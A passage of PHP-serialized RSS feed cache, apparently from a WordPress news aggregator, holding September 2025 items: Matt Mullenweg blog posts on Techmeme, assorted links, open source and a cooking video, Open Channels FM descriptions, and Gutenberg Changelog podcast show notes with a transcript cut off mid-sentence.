\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Matt: Techmeme 20\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149734\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://ma.tt/2025/09/techmeme-20/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:616:\"<p>It&#8217;s New Apple Stuff day, so the headlines are being dominated by that, but it&#8217;s worth taking a step back and paying homage to the site that has been the front page of tech news for two decades now, <a href=\"https://techmeme.com/\">Techmeme</a>. I&#8217;ve been a daily visitor since it started, and I appreciate how they pair the algorithm with a light human touch to provide a wide overview. (WordPress-powered!) <a href=\"https://crazystupidtech.com/2025/09/08/at-20-techmeme-has-never-been-hotter/\">Fred Vogelstein at Crazy Stupid Tech has a great review of how Techmeme started and evolved</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 09 Sep 2025 20:24:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"Open Channels FM: Lessons From Building and Managing Multiple WordPress Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=108988\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"https://openchannels.fm/lessons-from-building-and-managing-multiple-wordpress-plugins/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:188:\"Here are some lessons learned in building a WordPress plugin business, emphasizing experimentation, market understanding, customer support, and community engagement for sustainable growth.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 09 Sep 2025 09:53:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"Open Channels FM: The Founders of Podcaster Plus Share Product Development Experiences and Community Insights\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=108599\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"https://openchannels.fm/the-founders-of-podcaster-plus-share-product-development-experiences-and-community-insights/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:215:\"In this WP Behind the Builds episode, Mark Westguard discusses the upcoming Podcaster Plus plugin with founders Nathan and Dan, emphasizing its features like customizable audio players and automation for podcasters.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 09 Sep 2025 08:16:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"Matt: Assorted Links\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149725\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://ma.tt/2025/09/links/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1682:\"<p>A few interesting reads or listens:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://www.wired.com/story/multiple-chemical-sensitivity-tilt-claudia-miller/\">The Next Thing You Smell Could Ruin Your Life</a>, a deep dive into chemical sensitivity and toxicant-induced loss of tolerance, or TILT, by <a href=\"https://lexipandell.com/\">Lexi Pandell</a> (WordPress!) at Wired.</li>\n\n\n\n<li><a href=\"https://www.newyorker.com/culture/infinite-scroll/irl-brain-rot-and-the-lure-of-the-labubu\">IRL Brain Rot and the Lure of the Labubu</a>, by <a href=\"https://www.kylechayka.com/\">Kyle Chayka</a> at New Yorker.</li>\n\n\n\n<li><a href=\"https://simonwillison.net/2025/Aug/9/bay-area-ai/\">Simon Willison&#8217;s Lethal Trifecta talk</a>, on the myriad security issues that arise when combining LLMs, prompt injection, MCPs, and more.</li>\n\n\n\n<li><span style=\"margin: 0px; padding: 0px;\">Daniel Stenberg, a lead developer of the open source utility Curl, <a href=\"https://www.youtube.com/watch?v=6n2eDcRjSsk\" target=\"_blank\">talks at FrOSCon about how AI reports are gumming up their security workflows</a>.</span> (YouTube, 53 minutes.) </li>\n\n\n\n<li><a href=\"https://daniel.haxx.se/blog/2025/08/15/car-brands-running-curl/\">Daniel again (on his WordPress-powered blog) discusses a version of their maker/taker problem</a>, specifically the 47 car brands that use Curl but none that sponsor it.</li>\n\n\n\n<li>Fernando Borretti&#8217;s <a href=\"https://borretti.me/article/notes-on-managing-adhd\">Notes on Managing ADHD</a>.</li>\n\n\n\n<li>Good Taste Is More Important Than Ever, by <a href=\"https://www.theatlantic.com/author/nitin-nohria/\">Nitin Nohria</a> in The Atlantic.<br /></li>\n</ul>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 08 Sep 2025 23:20:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Matt: Maker Taker\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149704\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://ma.tt/2025/09/maker-taker/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2543:\"<p>My sister <a href=\"https://charleen.blog/\">Charleen</a> sent me this meme with the note &#8220;Someone needs to draw you in there with your arm up <img alt=\"🤣\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f923.png\" style=\"height: 1em;\" /><img alt=\"🤣\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f923.png\" style=\"height: 1em;\" /><img alt=\"🤣\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f923.png\" style=\"height: 1em;\" />&#8221; It&#8217;s a nice ode to the <a href=\"https://dri.es/solving-the-maker-taker-problem\">Dries essay on Maker/Taker problems</a>.</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img alt=\"\" class=\"wp-image-149705\" height=\"509\" src=\"https://i0.wp.com/ma.tt/files/2025/09/IMG_3812.jpeg?resize=604%2C509&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\n\n\n\n<p>Well, thanks to the magic of AI, I asked the <a href=\"https://aistudio.google.com/\">Nano Banana AI Studio</a> to &#8220;make it so on the bottom one person raises their hand,&#8221; and it didn&#8217;t work at first. So, I tried a few other variations, and then, voilà!</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-149706\" height=\"500\" src=\"https://i0.wp.com/ma.tt/files/2025/09/Generated-Image-September-06-2025-7_32PM-1024x848.jpeg?resize=604%2C500&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\n\n\n\n<p>Technology is amazing. And now we have a counter to the meme. Be that one hand that raises.</p>\n\n\n\n<p>Although this is a joke, I&#8217;m going to give humanity a high-five because, compared to when I started in technology, <a href=\"https://en.wikipedia.org/wiki/Halloween_documents\">which was more the Microsoft Halloween memo era, to where we are today</a>, I&#8217;m <strong>so impressed</strong> that so many makers, creators, designers, engineers, and leaders have adopted the moral framework of open source being part of their calling. Businesses, too! I used to get laughed out of the room or had spears thrown at the security of open source, but that is no longer a blocker, and the conversation has really elevated. It doesn&#8217;t feel like one person raising their hand anymore; it&#8217;s grown into a truly special movement, a lens through which you can view almost anything.</p>\n\n\n\n<p>Open source is the best way we have to set the foundation for future generations to build upon, ensuring the light cone of humanity&#8217;s technological expansion becomes something that belongs to all of us, not just a few.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 07 Sep 2025 19:08:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Matt: Breaking Ribs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149695\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"https://ma.tt/2025/09/breaking-ribs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1959:\"<p><span style=\"margin: 0px; padding: 0px;\"><a href=\"https://chrisyoungcooks.com/\" target=\"_blank\">Chris Young</a>, who is otherwise famous for being a <a href=\"https://modernistcuisine.com/books/modernist-cuisine/\" target=\"_blank\">co-author of the 2,438-page cookbook Modernist Cuisine</a> or <a href=\"https://www.youtube.com/shorts/s8OcZYCBaOo\" target=\"_blank\">centrifuging steaks and drinking them</a>, is one of the friends who, over the years, has told me I have to watch <a href=\"https://en.wikipedia.org/wiki/Breaking_Bad\" target=\"_blank\">Breaking Bad</a>, the TV show.</span> When I was in Marrakech for a few weeks earlier this year, and it was a million degrees outside, I cracked and started watching, and I see why people say it&#8217;s one of the best shows ever. I&#8217;m only up to S2E4, and I see why everyone loves it, including that it is sometimes unintentionally hilarious,  but I had to stop because it was getting a bit too dark and bumming me out before I went to bed.</p>\n\n\n\n<p>However, I&#8217;m glad I made it through that season and a half of Breaking Bad, because it has given me the ability to appreciate this homage Chris has done, attempting to use science and chemistry to cook ribs in an apartment oven just as well as you could with a smoker. If you live at the intersection of Breaking Bad, BBQ, science, chemistry, and cooking, this is the video for you. And now, this makes me want to order some <a href=\"https://thepitroombbq.com/\">Pit Room</a> in Houston. (WordPress-powered!)</p>\n\n\n\n<figure class=\"wp-block-embed alignwide is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\n\n\n\n<p>And if you haven&#8217;t yet, you should <a href=\"https://combustion.inc/\">buy one of Chris&#8217; Combustion Predictive Thermometers</a> (<a href=\"https://www.amazon.com/dp/B0DNKJ8FQB/?tag=photomatt08-20\">here on Amazon</a>). </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 06 Sep 2025 20:33:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:127:\"Gutenberg Times: Gutenberg Changelog 120—WordCamp US, Automattic Telex, Gutenberg 21.4 and 21.5, and the need for more blocks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://gutenbergtimes.com/?post_type=podcast&p=41792\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"https://gutenbergtimes.com/podcast/gutenberg-changelog-120-wordcamp-us-telex-gutenberg-21-4-and-21-5/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:48635:\"<p>Birgit Pauli-Haack and Sarah Norris discussed WordCamp US, Automattic Telex, Gutenberg 21.4 and 21.5, and the need for more blocks.</p>\n\n\n\n<p>This episode dives into the ongoing evolution of Gutenberg, from AI-driven tools for easier block creation to the expansion of core blocks and enhancements stemming from vibrant community input. There’s a strong focus on practical improvements for developers and better experiences for end users, all while staying plugged into the latest WordCamp happenings and the broader future of site editing in WordPress. </p>\n\n\n\n<p><a href=\"https://gutenbergtimes.com/podcast/https://gutenbergtimes.com/podcast/gutenberg-changelog-120-wordcamp-us-telex-gutenberg-21-4-and-21-5/#shownotes\">Show Notes</a> / <a href=\"https://gutenbergtimes.com/podcast/https://gutenbergtimes.com/podcast/gutenberg-changelog-120-wordcamp-us-telex-gutenberg-21-4-and-21-5/#transcript\">Transcript</a></p>\n\n\n\n<p></p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Editor: <a href=\"https://www.linkedin.com/in/sandy-reed/\">Sandy Reed</a></li>\n\n\n\n<li>Logo: <a href=\"https://markuraine.com/\">Mark Uraine</a></li>\n\n\n\n<li>Production: <a href=\"https://icodeforapurpose.com\">Birgit Pauli-Haack</a></li>\n</ul>\n\n\n\n<p class=\"has-larger-font-size\" id=\"shownotes\"><strong>Show Notes</strong></p>\n\n\n\n<h2 class=\"wp-block-heading\">Special Guest: <strong>Sarah Norris</strong></h2>\n\n\n\n<p>JavaScript Developer / Core team rep</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://profiles.wordpress.org/mikachan/\">WordPress Profile @mikachan</a></li>\n\n\n\n<li><a href=\"https://sekai.co.uk/\">Personal website: sekai.co.uk</a></li>\n\n\n\n<li><a href=\"https://twitter.com/mikachan_\">Twitter: @mikachan_</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">WordCamp US </h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://telex.automattic.ai/projects/new\">Automattic Telex </a>build block from plain-english prompts</li>\n\n\n\n<li>Adam Silverstein’s talk, <a href=\"https://wordpress.tv/2025/09/03/unlock-developer-superpowers-with-ai/\">Unlock Developer Superpowers with AI</a></li>\n\n\n\n<li>John Maeda’s talk,<a href=\"https://wordpress.tv/2025/09/03/cozy-ai-cooking-wordcamp-edition/\"> Cozy AI Cooking: WordCamp Edition</a></li>\n\n\n\n<li>Prof. Adam Gazzaley’s talk, <a href=\"https://wordpress.tv/2025/09/03/a-new-era-of-experiential-medicine-ai-and-the-brain/\">A New Era of Experiential Medicine—AI and the Brain</a></li>\n\n\n\n<li>Michelle Hunt’s <a href=\"https://wordpress.tv/2025/09/03/building-experiences-design-systems-user-experience-and-full-site-editing/\">Building Experiences: Design Systems, User Experience, and Full Site Editing</a></li>\n\n\n\n<li>Mary Ann Aschenbrenner’s talk, <a href=\"https://wordpress.tv/2025/09/03/moving-a-website-from-classic-to-a-block-theme/\">Moving a Website from Classic to a Block Theme</a></li>\n\n\n\n<li><a href=\"https://wordpress.tv/2025/09/03/block-composability-the-past-and-the-future/\">Block Composability: The Past and The Future</a> with Seth Rubenstein and Max Schmeling. </li>\n\n\n\n<li><a href=\"https://wordpress.tv/event/wordcamp-us-2025/\">Full list of talks is available on WordPress TV here.</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">WordPress Developer Blog</h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://developer.wordpress.org/news/2025/08/whats-new-for-developers-august-2025/\">What’s new for developers? (August 2025)</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2025/07/you-dont-need-theme-json-for-block-theme-styles/\">You don’t need theme.json for block theme styles</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2025/08/registering-custom-social-icons-in-wordpress-6-9/\">Registering custom social icons in WordPress 6.9</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2025/08/refactoring-the-multi-block-plugin-build-smarter-register-cleaner-scale-easier/\">Refactoring the Multi-Block Plugin: Build Smarter, Register Cleaner, Scale Easier</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/2025/09/implementing-namespaces-and-coding-standards-in-wordpress-plugin-development/\">Implementing Namespaces and Coding Standards in WordPress Plugin Development</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/news/subscribe/\">Subscribe to the blog</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Gutenberg releases and work in progress</h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://make.wordpress.org/core/2025/08/14/whats-new-in-gutenberg-21-4-13-august/\">What’s new in Gutenberg 21.4? (13 August)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2025/08/28/whats-new-in-gutenberg-21-5/\">What’s new in Gutenberg 21.5? (27 August)</a></li>\n\n\n\n<li><a href=\"https://github.com/WordPress/gutenberg/issues/71026\">New Block additions for the Block Library</a></li>\n\n\n\n<li><a href=\"https://gutenbergtimes.com/why-wordpress-core-needs-more-blocks/\">Why WordPress Core needs more blocks</a><br /></li>\n</ul>\n\n\n\n<p class=\"has-large-font-size\">Stay in Touch</p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<ul class=\"wp-block-list\">\n<li>Did you like this episode? <a href=\"https://lovethepodcast.com/gutenbergchangelog\"><strong>Please write us a review </strong></a></li>\n\n\n\n<li>Ping us on X (formerly known as Twitter) or send DMs with questions. <a href=\"https://twitter.com/gutenbergtimes\">@gutenbergtimes </a>and <a href=\"https://twitter.com/bph\">@bph</a>.</li>\n\n\n\n<li><em>If you have questions or suggestions, or news you want us to include, send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a>. </em></li>\n\n\n\n<li><em>Please write us a review on iTunes! <a href=\"https://gutenbergtimes.com/itunes/\">(Click here to learn how)</a></em></li>\n</ul>\n</div></div>\n\n\n\n<p class=\"has-large-font-size\" id=\"transcript\"><strong>Transcript</strong></p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Hello, and welcome to our 120th episode of the Gutenberg Changelog Podcast. In today&#8217;s episode we will talk about WordCamp US, Telex, Gutenberg 21.4 and 5 and also we will discuss that we need more blocks. Maybe. I&#8217;m your host Birgit Pauli-Haack, curator at the Gutenberg Times and WordPress developer advocate and full-time core contributor for the WordPress open source project sponsored by Automattic. </p>\n\n\n\n<p>And after a long break, Sarah Norris joins me again. Yay. She is a co-core team rep, a core contributor to the Goodwill Project, and developer and designer working for Automattic. Thank you so much for taking the time and coming onto the show again. Sarah, how are you today? And maybe you can briefly outline what you have been working on for what might be coming to WordPress 6.9.</p>\n\n\n\n<p><em>Sarah Norris:</em> Yeah, sure. Yeah. Hello. It has been a really long time. It&#8217;s good to be back. Yeah, I&#8217;m good. I&#8217;m looking forward to autumn, my favorite time of year. So for 6.9 I&#8217;ve mostly been working on new blocks. Yes, all the new blocks. I&#8217;ve been working on the Accordion block, which was called Accordions but is now called Accordion Singular. Also I&#8217;ve been looking over the new tabs block. There&#8217;s a PR going for that that I&#8217;m really interested in, looking at maybe getting the table of contents block stabilized as well. I think there&#8217;s a lot of work to do there, but I think it&#8217;s, it&#8217;s quite well rounded, well outlined so we can get stuck in there. And then I&#8217;ve also been working on a new terms query block as well. So that&#8217;s it&#8217;s like the query loop block but for taxonomies.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Wow, it sounds exciting. Awesome. Awesome. So you&#8217;re the right person to talk about. We need more blocks later on so we&#8217;re coming to the announcements. </p>\n\n\n\n<h3 class=\"wp-block-heading\">Announcements</h3>\n\n\n\n<h3 class=\"wp-block-heading\">Automattic Telex</h3>\n\n\n\n<p>So at his keynote at WordCamp US, Matt Mullenweg, you probably heard it all already, dear listeners announced experimental AI tool called Telex, and it can be used to build new blocks with a plain English language prompt so you don&#8217;t have to speak code. So try it out. I&#8217;ll share the links in the show notes. And Ray Mori from the repository has quite done a good rundown of all the reactions for Telex on Twitter and all that. So I&#8217;m going to share this with you. But it&#8217;s a really exciting tool and it&#8217;s also experimental, so it might not have the outcome that you want, but you might get new ideas from it. So have you tried it out, Sarah?</p>\n\n\n\n<p><em>Sarah Norris:</em> Yes. Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Yeah.</p>\n\n\n\n<p><em>Sarah Norris: </em>I&#8217;ve been following the development closely and trying it out. It&#8217;s amazing. It&#8217;s so much fun to use. Yeah. Definitely recommend people try it out. You might not get what you expect, but I don&#8217;t know if you ever do with AI, it&#8217;s all about what you put into it, isn&#8217;t it? And see what you get. Especially for new blocks. People should try it to build new blocks.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>So did you build a new block?</p>\n\n\n\n<p><em>Sarah Norris: </em>I built a few ideas, like a few silly things. I haven&#8217;t tried it on any new core blocks yet. Maybe that&#8217;s the. The next step. Maybe I should try it on all these new core blocks we&#8217;ve got coming up.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Well, but I&#8217;m more interested in the silly things than the crazy things or in the quirky things. But did you try?</p>\n\n\n\n<p><em>Sarah Norris: </em>What did I try? I&#8217;ve tried like some random image generators, just like some random color stuff as well. Trying like different colors, different patterns.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah.</p>\n\n\n\n<p><em>Sarah Norris:</em> Maybe I should add some to the new live tool so we can get them in the library.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>There&#8217;s a library maybe coming up. Okay, well, it&#8217;s the next current step. Yeah. Kind of thinking about, okay, if so many people build blocks and we want to kind of showcase all those ideas, if they&#8217;re ready enough so other people can use them, then you probably want to have a site for that. That&#8217;s totally true. Yeah, true. </p>\n\n\n\n<h3 class=\"wp-block-heading\">WordCamp US</h3>\n\n\n\n<p>Anyway, so speaking of WordCamp viewers, the talks are almost all uploaded to WordPress TV, so the team is really amazing. And there were fantastic talks at the showcase day as well as the other days. And we had about a dozen talks about AI in all kinds of flavors. And I only want to kind of point out three of them. One was for developers. Adam 